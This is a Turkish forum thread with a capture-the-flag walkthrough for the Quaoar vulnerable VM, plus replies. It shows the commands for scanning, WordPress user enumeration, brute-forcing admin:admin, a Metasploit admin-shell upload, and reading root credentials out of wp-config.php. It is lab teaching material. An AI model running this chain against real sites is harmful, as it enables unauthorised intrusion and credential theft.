İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Quaoar :Açıklı Makine Çözümü /-The Hacker

10-02-2019 09:19
#1
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2017
Mesajlar:
2.944
Teşekkür (Etti):
199
Teşekkür (Aldı):
909
Konular:
86


Merhaba Arkadaşlar Bu Konuda "Quaoar VM" Açıklı Makinesinin Nasıl Çözüldüğünü Anlatıcam. Ctf Alanında İlerlemek İstiyor İseniz Yada Daha Yeni Başladıysanız Bu Konu Tam Sizler İçin Çünkü Makine Açıklamasında Bile ;



Yazmakta Ki Bencede Öyle Bu Konunun Açılma Sebebi Temel Olarak Forumdaki Yeni Başlamış Hevesli Kitleye Hitap Etmek. CTF Hakkında Daha Detaylı Bilgiye Şu Rehber Konudan Ulaşabilirsiniz.

Bölümü Güncel Olarak Takip Ederek Kendinizi Geliştirebilirsiniz. Konuya Geçelim.

Kod:
Hedef ;  Bu makinede 3 tane bayrak vardır 1. Bir kabuk alın 2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var (Gugıl İle Çevirdim Çeviri Ne Kadar Doğru Bilemem.)

Şimdi İse Çözüme Geçelim.



İlk Olarak Hedef Makinemizim İp Adresini Bulmak İçin "netdiscover" Aracını Çalıştıralım.




Hedef İp Adresini Öğrendiğimize Göre Nmap Taraması Yaparak Açık Portları Görelim.


Kod:
nmap -A -T4 192.168.1.13


Nmap Tarama Sonuçlarını İncelediyseniz Eğer Dikkatinizi Benim Gibi Robots.txt Dosyası Çekmiştir. İncelemek Üzere Curl Aracını Çalıştırıyorum.


Kod:
curl 192.168.1.13/robots.txt


Beni "/wordpress" Uzantısına Yönlendiriyor Girdiğimde İse Hiçbirşey Bulamadım Buda Beni Otomatik Olarak "/wordpress/wp-login.php" Yönlendirdi .


Login Ekranında Pek Fazla Birşey Yapamayacağım İçin "wpscan" Aracını Kullanarak Sistemdeki Açıkları ve Username'leri Bulacağız.
Kullanacağım Komut ;


Kod:
wpscan --url http://192.168.1.13/wordpress/ --enumerate u

Sonuç Olarak Bana 2 Tane Username Verdi Bende Bunları Burpsuite Üzerindne Kaba Kuvvet Saldırısında Kullanıcam.
(Burpsuite İşin Tamamen Can Sıkıntısından Kullanıldı Ki Diğer Kolay Yollarlada Şifreyi Bulabilirsiniz. Misal Hydra İlede Deneyebilirsiniz. )





Kullandığım Wordlist İse ;
Username

Kod:
admin
wpuser
Password

Kod:
password
administrator
admin
wpuser
wordpress
wpadministrator



Bu Şekilde de Sitenin Admin Giriş Bilgilerini Kaba Kuvvet Saldırısı İle Bulduk.


Kod:
admin:admin
(Anlatım Zaten Forumda Olduğu İçin Yeniden Yazma Gereği Duymadım Şu Konuda Bulabilirsiniz;https://www.turkhackteam.org/siber-g...am_hacker.html )


Şimdi İse İlk Görevi Yapalım O Zaman. "1. Bir kabuk alın" Sisteme Shell Upload Edicez Kullanıcağımız Modül


Kod:
use exploit/unix/webapp/wp_admin_shell_upload
Gerekli Bilgileri Girelim.


Kod:
set PASSWORD admin
 set USERNAME admin
set RHOST 192.168.1.13
set TARGETURI /wordpress/
run


Meterpreter Shell'imizi Aldığımızı Göre Diğer Görevler Yani "2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var "
Bundan Sonra İse pwd ile hangi dizinde olduğumuzu öğrenip Bayrağımızı arıyoruz.




İlk Bayrağımızı Yakalamış Olduk. Kodlar;

Kod:
cd /home
cd wpadmin
ls
cat flag.txt
Sıra İkinci Bayrakta Bunun İçinde Artık /home Dizininden Çıkmak Gerekli


Kod:
cd /
Komutu ile çıkıp "ls" Komutu İle Bulunduğumuz Dizini Listeliyoruz. Dizinlerde Gezerken Yapılandırma Dosyasını Gördüm Ve Düşündüğüm Gibi;

Kod:
cd /var
ls
cd www
ls
cd wordpress
ls
cat wp-config.php
Ve Ssh Bağlantı Bilgilerimizide Almış Olduk.




Kod:
root
rootpassword!

Bağlantıyı Kurup .


Bayrağımızı Yakalayalım.
Tek Girmeniz Gereken Kod'lar


Kod:
ls 
more flag.txt
Ve 2.ci Bayrağımızıda Bulduk.




Konu Buraya Kadardı Ayrıca Bendende Buraya Kadardı 20 Saat Civarı Uyumuyordum Uykuyu Hakettiğimi Düşünüyorum Size İyi Okumalar Banada İyi Uykular
Konu THE HACKER 21 tarafından (10-02-2019 17:49 Saat 17:49 ) değiştirilmiştir.

10-02-2019 09:29
#2
Üyelik tarihi:
09/2018
Mesajlar:
1.013
Teşekkür (Etti):
589
Teşekkür (Aldı):
207
Konular:
15
Gerçekten uğraşılmış bir konu. İyi uykular hocam
Kullanıcı İmzası

Son ırmak kuruduğunda, son ağaç kesildiğinde, son balık tutulduğunda, beyaz adam paranın yenmeyecek bir şey olduğunu anlayacak.
11-02-2019 06:43
#3
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2017
Mesajlar:
2.944
Teşekkür (Etti):
199
Teşekkür (Aldı):
909
Konular:
86
Alıntı:
TURKISH STARS´isimli üyeden Alıntı Mesajı göster
Gerçekten uğraşılmış bir konu. İyi uykular hocam
Teşekkürler .
11-02-2019 08:37
#4
Daedalus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2015
Mesajlar:
215
Teşekkür (Etti):
43
Teşekkür (Aldı):
17
Konular:
19
Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?
Kullanıcı İmzası
if (dev.isBored() || job.sucks()) {
searchJobs({flexibleHours: True, companyCulture: 100});

}
11-02-2019 08:47
#5
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2017
Mesajlar:
2.944
Teşekkür (Etti):
199
Teşekkür (Aldı):
909
Konular:
86
Alıntı:
Daedalus´isimli üyeden Alıntı Mesajı göster
Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?
Elbette https://www.vulnhub.com/ Sitesinden Kendi Bilginizi Test Amaçlı ve Kendinizi Geliştirmek İçin Diğer Makinelere Ulaşabilirsiniz. Rehber Konuyuda Okuyarak Zafiyetli Makineler Hakkında Diğer Bilgilere Ve Paylaşılan Platformlara Bakabilirsin.
https://www.turkhackteam.org/capture...m-rehberi.html
İkinci Soru İçinde https://www.turkhackteam.org/capture-flag/ Bölümünü Güncel Olarak Takip Ederseniz Zaten Bu Gibi Konuların Geldiğini Ve Geleceğinide Görürsünüz
.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı